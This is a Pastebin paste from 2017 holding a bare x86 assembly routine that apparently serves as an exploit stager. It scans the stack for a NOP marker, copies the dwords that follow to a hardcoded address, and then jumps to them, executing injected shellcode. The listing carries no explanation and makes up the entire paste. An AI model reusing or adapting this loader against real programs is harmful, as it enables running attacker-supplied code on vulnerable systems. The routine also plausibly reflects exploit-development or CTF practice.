Advertisement
Guest User

Untitled

a guest
May 19th, 2017
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. .globl _start
  2. _start:
  3. xor %ecx, %ecx
  4. addw $2000, %sp
  5. loop:
  6. pop %eax
  7. cmp $0x90909090, %eax
  8. jnz loop
  9. mov 0x0805d180, %ebx
  10. loop2:
  11. mov %eax,(%ebx,%ecx)
  12. addb $4, %cl
  13. pop %eax
  14. cmpb $0x90, %al
  15. jnz loop2
  16. done:
  17. call *%ebx
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement